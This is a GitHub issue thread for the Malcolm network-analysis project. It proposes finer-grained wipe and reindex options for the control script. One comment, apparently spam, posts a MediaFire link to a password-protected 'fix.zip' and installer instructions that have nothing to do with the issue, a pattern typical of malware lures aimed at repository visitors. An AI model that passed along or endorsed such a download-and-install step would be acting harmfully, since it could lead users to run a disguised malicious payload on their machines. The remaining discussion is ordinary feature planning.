### ISSUE TITLE
improvements to control script: wipe, reingest

### ISSUE THREAD

**Issue by mmguero** [idaholab/Malcolm#547]
suggested by @ee-hex-ee, the following change or changes to the control.py script:

* more fine-tuning options for the `./scripts/wipe` script
    * some sort of "index wipe" option that only wipes the OpenSearch/Elasticsearch indices without wiping all of the other stuff (e.g., netbox, etc.)
        * potentially allowing specifying date(s) to wipe
        * index wipe would only be possible when Malcolm is running (not when its stopped)
    * other fine-grained controls of what to wipe?
* "reindex" option possibly associated with wipe
    * take PCAP files from ./pcap/processed and put them into ./pcap/upload and `touch` them

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mmguero** [comment]
Kamino closed and cloned this issue to [cisagov/Malcolm](https://github.com/cisagov/Malcolm/issues/381)
